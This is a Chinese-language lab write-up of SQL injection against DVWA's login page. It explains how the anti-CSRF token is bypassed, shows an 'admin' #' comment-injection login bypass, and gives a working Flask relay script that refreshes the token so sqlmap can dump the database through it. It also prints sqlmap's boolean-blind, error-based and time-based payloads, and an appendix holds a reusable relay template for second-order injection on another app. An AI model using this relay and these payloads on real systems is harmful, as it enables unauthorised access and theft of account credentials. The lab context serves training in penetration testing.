一、实验过程
步骤0:注释掉相关username防护,截图如下:
以DVWA为攻击目标,将login.php中第21、22行注释掉
步骤1:源码分析,截图如下:
如此可知,首先需要通过token验证,然后能进行查询。
1.token验证通过。
这里token用到的函数是dvwaPage.inc.php中调用的
通过查看函数被调用的部分和逻辑,可知该检测是如此检测或者说避免CSRF攻击的:
①访问login.php,页面生成、存储并返回一个session_token1
②用户输入账号密码等动作,点击login,是以post方式把请求参数以及user_token=session_token1提交
③服务端接收请求,比较user_token是否等于存储的session_token,如果是则通过,进行下一步动作。
④服务端销毁旧token,生成、存储新的token,并把token附带在响应中返回
重复②~④
因此,我们只需要现访问login.php,不带参数,然后即可获取token,然后再将token作为参数之一,发送登录的请求包即可。
这就是我们中转页面所做的事情
2. token绕过以后
实际上就可以直接上SQLmap摁解了。但是如果我们细心的看一下sql查询语句,即可发现:如果我们输入形如的用户名,查询的sql语句即
admin' #
-->
SELECT * FROM `users` WHERE user='admin' # ' AND password='$pass';
也就是说直接查询登录(如果存在该合法用户)admin用户!
然而我们不只是要登录,还要获得尽可能所有人的账户密码,那就还是sqlmap吧~
开爆即可。
步骤2:编写基于Flask框架的中转:
from flask import Flask
from flask import request
import requests
import time
import hashlib
from bs4 import BeautifulSoup
def generate_session_token():
# 模拟 PHP 的 uniqid() 函数
unique_id = str(time.time())
# 使用 md5 哈希算法生成会话令牌
session_token = hashlib.md5(unique_id.encode()).hexdigest()
print(session_token)
return session_token
def custom_fun(payload):
# 构造请求头部信息
headers = {
'Host': '127.0.0.1',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8',
'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
'Accept-Encoding': 'gzip, deflate',
'Content-Type': 'application/x-www-form-urlencoded',
'Origin': 'http://127.0.0.1',
'Connection': 'close',
'Referer': 'http://127.0.0.1/DVWA-master/login.php',
'Cookie': 'security=low; PHPSESSID=ooao2k5lopsqj2trhv42gi7r9i',
'Upgrade-Insecure-Requests': '1',
'Sec-Fetch-Dest': 'document',
'Sec-Fetch-Mode': 'navigate',
'Sec-Fetch-Site': 'same-origin',
'Sec-Fetch-User': '?1'
}
username=payload
#获得session_token
url = 'http://127.0.0.1/DVWA-master/login.php'
session=requests.session()
resp=session.get(url=url, headers=headers)
# 创建Beautiful Soup对象
soup = BeautifulSoup(resp.text, 'html.parser')
# 使用find方法找到第一个具有name属性为'user_token'的input标签
input_tag = soup.find('input', {'name': 'user_token'})
# 获取input标签的value属性值
user_token_value = input_tag['value']
print(user_token_value)
user_token=user_token_value
# 构造POST请求的数据
data = {
'username': username,
'password': 'xxxxx',
'Login': 'Login',
'user_token': user_token
}
# print(data)
session = requests.session()
# 发送POST请求
url = 'http://127.0.0.1/DVWA-master/login.php'
resp = session.post(url=url, headers=headers ,data=data)
# resp = session.post(url=url,data=data)
resp.encoding = resp.apparent_encoding
# print(resp.text)
return resp.content
app = Flask(__name__)
@app.route('/', methods=['GET', 'POST'])
def index():
if request.method == 'GET':
payload = request.args.get('payload')
elif request.method == 'POST':
payload = request.form.get('payload')
return custom_fun(payload)
def main():
app.run(host='0.0.0.0', port=5050, debug=True)
if __name__ == "__main__":
main()
步骤3:SQLmap报告结果,截图如下:
1.注入类型
sqlmap identified the following injection point(s) with a total of 465 HTTP(s) requests:
Parameter: payload (GET)
Type: boolean-based blind Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: payload=123' RLIKE (SELECT (CASE WHEN (3554=3554) THEN 123 ELSE 0x28 END))-- MmOp
Type: error-based Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET) Payload: payload=123' AND GTID_SUBSET(CONCAT(0x716b6a7671,(SELECT (ELT(2648=2648,1))),0x716a6b7871),2648)-- qezK
Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: payload=123' AND (SELECT 2742 FROM (SELECT(SLEEP(5)))ooXF)—WVlp
二、注入结果
三、附录
这里把代理中转demo发一下,遇到相关需求,改相应代码和逻辑即可
# demo
from flask import Flask
from flask import request
import requests
import random
def custom_fun(payload):
email = '{}@qq.com'.format(int(random.random() * 10000000))
username = payload
password = '123'
proxy = {'http': '127.0.0.1:8080'}
session = requests.session()
# 注册
burp0_url = "http://192.168.154.130:80/web/register.php"
burp0_headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Content-Type": "application/x-www-form-urlencoded", "Origin": "http://192.168.154.130", "Connection": "close", "Referer": "http://192.168.154.130/web/register.php", "Upgrade-Insecure-Requests": "1"}
burp0_data = {"name": username, "pw": password, "repw": password, "email": email, "submit": ''}
resp = session.post(burp0_url, headers=burp0_headers, data=burp0_data, proxies=proxy)
# 登陆
burp0_url = "http://192.168.154.130:80/web/login.php"
burp0_headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Content-Type": "application/x-www-form-urlencoded", "Origin": "http://192.168.154.130", "Connection": "close", "Referer": "http://192.168.154.130/web/login.php", "Upgrade-Insecure-Requests": "1"}
burp0_data = {"email": email, "pw": password, "submit": ''}
r1 = session.post(burp0_url, headers=burp0_headers, data=burp0_data, proxies=proxy)
# 登陆后跳转到首页
burp0_url = "http://192.168.154.130/web/index.php"
burp0_headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Connection": "close", "Upgrade-Insecure-Requests": "1"}
resp = session.get(burp0_url, headers=burp0_headers, proxies=proxy)
resp.encoding = resp.apparent_encoding
return resp.text
app = Flask(__name__)
@app.route('/', methods=['GET', 'POST'])
def index():
if request.method == 'GET':
payload = request.args.get('payload')
elif request.method == 'POST':
payload = request.form.get('payload')
return custom_fun(payload)
def main():
app.run(host='127.0.0.1', debug=True)
if __name__ == "__main__":
main()